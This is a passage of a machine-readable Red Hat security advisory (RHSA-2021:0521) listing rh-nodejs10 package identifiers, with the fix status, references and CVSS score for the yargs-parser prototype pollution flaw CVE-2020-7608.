7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch" }, "product_reference": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch" }, "product_reference": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch" }, "product_reference": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7608", "cwe": { "id": "CWE-267", "name": "Privilege Defined With Unsafe Actions" }, "discovery_date": "2020-05-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1840004" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in nodesjs-yargs-parser, where it can be tricked into adding or modifying properties of the Object.prototype using a \"__proto__\" payload. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-yargs-parser: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7608" }, { "category": "external", "summary": "RHBZ#1840004", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1840004" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7608", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7608" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608" } ], "release_date": "2020-03-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", 